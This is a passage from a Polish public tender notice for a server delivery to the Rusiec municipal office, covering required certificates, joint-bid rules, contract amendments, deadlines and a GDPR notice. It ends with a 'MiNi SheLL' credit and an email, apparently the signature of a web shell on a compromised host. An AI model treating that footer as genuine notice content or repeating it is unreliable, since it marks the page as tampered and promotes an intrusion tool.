potwierdzający, że sprzęt spełnia wymogi Dyrektywy WEEE 2002/96/EC (wydruk ze strony internetowej www.epeat.net);<br/>•	oświadczenie producenta serwera lub podmiotu realizującego serwis, że w przypadku awarii dysku twardego w urządzeniu objętym aktywnym wsparciem technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego. <br/>•	oświadczenie producenta serwera, że serwis urządzenia będzie realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta;<br/>•	dokument potwierdzający, że firma serwisująca posiada ISO 9001:2015 oraz ISO-27001 na świadczenie usług serwisowych oraz posiada autoryzację producenta urządzenia.<br/><br/>	dostawa serwera wraz z wdrożeniem oraz z zasilaniem awaryjnym dla Urzędu Gminy Rusiec:<br/>•	karta produktowa oferowanego serwera umożliwiająca weryfikację jego parametrów;<br/>•	oświadczenie producenta serwera w zakresie deklaracji CE dla serwera;<br/>•	oświadczenie producenta serwera, że serwer jest wyprodukowany zgodnie z normą ISO-9001:2015, ISO-500001 oraz ISO-14001;<br/>•	dokument potwierdzający, że sprzęt spełnia wymogi Dyrektywy WEEE 2002/96/EC (wydruk ze strony internetowej www.epeat.net);<br/>•	oświadczenie producenta serwera lub podmiotu realizującego serwis, że w przypadku awarii dysku twardego w urządzeniu objętym aktywnym wsparciem technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego. <br/>•	oświadczenie producenta serwera, że serwis urządzenia będzie realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta;<br/>•	dokument potwierdzający, że firma serwisująca posiada ISO 9001:2015 oraz ISO-27001 na świadczenie usług serwisowych oraz posiada autoryzację producenta urządzenia. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 	Załącznik nr 3 - oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu;<br/>	Załącznik nr 5 – wykaz osób do realizacji przedmiotu zamówienia;<br/>	przedmiotowe środki dowodowe wymienione w Rozdział XII Pkt. 3. <br/>	pełnomocnictwo ustanowione do reprezentowania Wykonawcy lub Wykonawców ubiegających się o udzielenie zamówienia publicznego – w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku zaś jeśli pełnomocnictwo zostało wystawione w wersji papierowej i opatrzone jest własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w wersji papierowej może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający informuje, że dopuszcza możliwość, aby Wykonawcy wspólnie ubiegali się o udzielenie zamówienia. <br/>2.	Zamawiający wymaga, aby Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanowili pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu, a także do zawarcia umowy w sprawie zamówienia publicznego. <br/>3.	Zapis rozdziału XIII pkt. 2 SWZ nie dotyczy spółki cywilnej, o ile upoważnienie bądź pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź sytuacji, kiedy wszyscy wspólnicy spółki cywilnej podpiszą ofertę. <br/>4.	Zamawiający wymaga, aby oferta Wykonawców, którzy ubiegają się wspólnie o udzielenie zamówienia, została podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących łącznie (tj. przez każdego z Wykonawców lub przez upoważnionego pełnomocnika). <br/>5.	Zamawiający informuje, że w przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców – oświadczenie, o którym głosi Art. 125 Ustawy Pzp, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te winny potwierdzać spełnienie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia, wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia z postępowania – każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. <br/>6.	Zamawiający informuje, że zgodnie z zapisami Rozdziału XIII pkt. 5 SWZ:<br/>	oświadczenie w zakresie braku podstaw do wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>	oświadczenie o spełnieniu warunków udziału w postępowaniu składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnienie, przy czym Zamawiający dopuszcza możliwość złożenia oświadczenia łącznie, czyli podpisane przez wszystkie podmioty składające wspólnie ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów. <br/>7.	Zamawiający informuje, że wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występujący w roli pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony mają prawo do przedłużenia terminu wykonania zamówienia o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie tego terminu, w następujących sytuacjach:<br/>1)	jeżeli wystąpią opóźnienia w dostawach sprzętu lub poszczególnych komponentów, wynikające z przyczyn niezależnych od Wykonawcy;<br/>2)	jeżeli wystąpi siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z jej postanowieniami.<br/>2.	Strony są uprawnione do żądania zmiany umowy w zakresie przedmiotu zamówienia w następujących sytuacjach:<br/>1)	konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych ze względu na zmiany obowiązującego prawa;<br/>2)	możliwości zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych, jeżeli pojawią się nowsze rozwiązania w stosunku do zawartych w opisie przedmiotu zamówienia.<br/>3.	Jeżeli Wykonawca lub Zamawiający uważa, że zachodzi podstawa do dokonania zmiany umowy w oparciu o przepis ust. 1 lub 2, zobowiązany jest do przekazania drugiej Stronie wniosku o dokonanie zmiany umowy, zamieszczając w nim:<br/>1)	opis zdarzenia lub okoliczności stanowiących podstawę do żądania zmiany,<br/>2)	proponowane rozwiązanie zmiany,<br/>3)	zestawienie zysków i strat wynikających z wprowadzenia zmiany, <br/>4)	podpis wnioskodawcy zmiany.<br/>4.	W terminie 7 dni kalendarzowych od dnia otrzymania wniosku o dokonanie zmiany umowy Strona powiadomi drugą Stronę o akceptacji żądania zmiany umowy lub odpowiednio o braku akceptacji zmiany.<br/>5.	Wszelkie zmiany umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu do umowy, pod rygorem nieważności.<br/><br/>SZCZEGÓŁOWY RODZAJ I ZAKRES ZMIAN UMOWY ORAZ WARUNKI ICH WPROWADZENIA OKREŚLA ZAŁ. NR 5 DO SWZ (PROJEKTOWANE POSTANOWIENIA UMOWY). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-04 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dalsza część informacji w zakresie Wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej: <br/>11.	Zamawiający informuje, że w przypadku załączników, które zgodnie z Ustawą Pzp i/lub Rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych są opatrzone kwalifikowanym podpisem elektronicznym, podpisem profilem zaufanym lub podpisem osobistym, mogą być opatrzone (zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/Podmiotu udostępniającego zasoby), podpisem typu zewnętrznego lub wewnętrznego. Zgodnie z tym, w zależności od rodzaju użytego podpisu i jego typu (typ zewnętrzny lub wewnętrzny), dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (podpis typu zewnętrznego) lub dokument z ujętym podpisem (podpis typu wewnętrznego). <br/>12.	Zamawiający informuje, że maksymalny rozmiar plików wysyłanych za pośrednictwem Platformy e-Zamówienia i „Formularzy kontaktowych” wynosi 150 MB (wielkość plików przesyłanych jako załączniki w ramach jednego formularza). <br/>13.	Zamawiający informuje, że minimalne wymagania techniczne dotyczące użytkowanego sprzętu w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia internetowego określają Regulaminy Platformy e-Zamówienia. <br/>14.	Zamawiający informuje, że w przypadku problemów technicznych i awarii dotyczących prawidłowego funkcjonowania Platformy e-Zamówienia użytkownicy Platformy mogą korzystać ze wsparcia technicznego pod numerem kontaktowym (+48) 22 258 77 88 lub drogą elektroniczną poprzez formularz kontaktowy dostępny na Platformie e-Zamówienia w zakładce „Zgłoś problem”.<br/><br/>Dalsza część informacji w zakresie RODO (obowiązek informacyjny):<br/>9)	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO, prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10)	Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4). Ponadto Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem wykonawcy w postępowaniu, Zamawiający zobowiązuje wykonawcę do złożenia w postępowaniu o udzielenie zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.<br/>11)	Wzór oświadczenia wymaganego od wykonawcy w zakresie wypełnienia przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO został uwzględniony we wzorze formularza ofertowego (Załącznik Nr 1 do SWZ).<br/>12)	Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy ustawy z 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz.U. z 2024 r. poz. 1320 ze zm.) oraz przepisy RODO.

Creat By MiNi SheLL
Email: jattceo@gmail.com